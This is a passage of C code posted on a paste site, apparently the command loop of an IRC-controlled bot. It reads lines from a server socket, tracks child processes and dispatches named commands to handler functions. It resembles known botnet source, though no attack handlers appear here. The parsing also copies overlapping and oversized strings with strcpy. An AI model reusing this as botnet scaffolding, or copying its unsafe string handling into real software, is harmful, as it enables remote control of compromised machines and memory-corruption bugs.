- if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
- for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
- unsigned int *newpids,on;
- for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
- pids[on-1]=0;
- numpids--;
- newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
- for (on=0;on<numpids;on++) newpids[on]=pids[on];
- free(pids);
- pids=newpids;
- }
- if (FD_ISSET(sock,&n)) {
- char buf[4096], *str;
- int i;
- if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
- buf[i]=0;
- str=strtok(buf,"\n");
- while(str && *str) {
- char name[1024], sender[1024];
- filter(str);
- if (*str == ':') {
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- strcpy(sender,str+1);
- strcpy(str,str+i+1);
- }
- else strcpy(sender,"*");
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- strcpy(name,str);
- strcpy(str,str+i+1);
- for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
- if (!strcasecmp(name,"ERROR")) goto sa;
- str=strtok((char*)NULL,"\n");
- }
- }
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement